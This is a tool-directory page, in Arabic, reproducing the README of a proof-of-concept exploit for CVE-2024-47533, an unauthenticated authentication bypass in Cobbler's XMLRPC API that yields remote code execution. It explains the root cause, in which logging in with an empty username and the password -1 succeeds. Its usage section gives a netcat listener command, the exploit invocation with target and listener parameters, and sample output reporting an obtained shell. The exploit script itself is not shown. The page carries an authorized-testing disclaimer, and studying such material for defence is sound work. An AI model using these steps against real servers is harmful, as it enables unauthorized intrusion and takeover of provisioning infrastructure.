Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-47533-PoC — استغلال إثبات المفهوم لـ CVE-2024-47533، تجاوز مصادقة غير مصادق عليه في واجهة برمجة تطبيقات XMLRPC في Cobbler مما يؤدي إلى تنفيذ الأوامر عن بُعد عبر قشرة عكسية محقونة. | Kitploit
أدوات/GitHubGitHub/00xcanelo/cve-2024-47533-poc
المصادقة والترخيصالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

استغلال إثبات المفهوم لـ CVE-2024-47533، تجاوز مصادقة غير مصادق عليه في واجهة برمجة تطبيقات XMLRPC في Cobbler مما يؤدي إلى تنفيذ الأوامر عن بُعد عبر قشرة عكسية محقونة.

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-47533 – تجاوز التحقق في Cobbler XMLRPC → شل عكسية (RCE غير مصادق)

📌 ملخص

يحتوي هذا المستودع على إثبات المفهوم (PoC) لاستغلال الثغرة CVE-2024-47533،
وهو تجاوز تحقق خطير في واجهة Cobbler XMLRPC API يؤدي إلى تنفيذ أكواد عن بُعد بدون مصادقة (RCE).

يستغل هذا الإكسبلويت خلل طريقة login() في واجهة XMLRPC لتجاوز التحقق وحقن أمر شل عكسية عبر background_import().


⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والبحثية واختبار الاختراق المصرح به فقط.
لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الأضرار.


🛠 تفاصيل تقنية

  • نوع الثغرة: تجاوز التحقق → RCE
  • المكون المتأثر: واجهة Cobbler XMLRPC API
  • ناقل الهجوم: شبكة
  • الصلاحيات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء

السبب الجذري:
utils.get_shared_secret() تعيد بشكل غير صحيح -1 بسبب سوء معالجة قراءة الملفات في الوضع الثنائي مع ترميز، مما يسمح بالمصادقة باسم مستخدم فارغ وكلمة مرور -1.

التأثير:
يمكن للمهاجم:

  • الحصول على وصول API بمستوى مدير
  • حقن أوامر نظام عشوائية في قوالب Cobbler
  • تشغيل شل عكسية على الهدف

🚀 الاستخدام

1️⃣ استنساخ المستودع

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ إعداد مستمع

على جهاز المهاجم:

root@kitploit:~
nc -lvnp 4444

3️⃣ تشغيل الإكسبلويت

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

مثال:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 هيكل الملفات

root@kitploit:~
.
├── CVE-2024-47533.py  # سكريبت استغلال الشل العكسية
└── README.md          # التوثيق

📸 مثال على المخرجات

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.

🧑‍💻 المؤلف

00xCanelo
ملف GitHub الشخصي


📚 المراجع

  • NVD: CVE-2024-47533
  • مشروع Cobbler على GitHub
تنزيل الأداة